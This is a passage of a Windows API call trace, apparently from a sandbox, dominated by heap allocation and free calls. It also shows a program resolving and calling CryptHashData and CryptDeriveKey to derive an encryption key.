hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0185.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0185.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.139] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.139] CryptHashData (hHash=0xa87410, pbData=0x2e54f08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0185.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0185.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0185.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.144] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0185.144] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0185.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0185.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50ab8 [0185.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50ab8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.148] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87410, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87550) returned 1 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.148] RtlAllocateHeap (HeapHandle=0x970000, 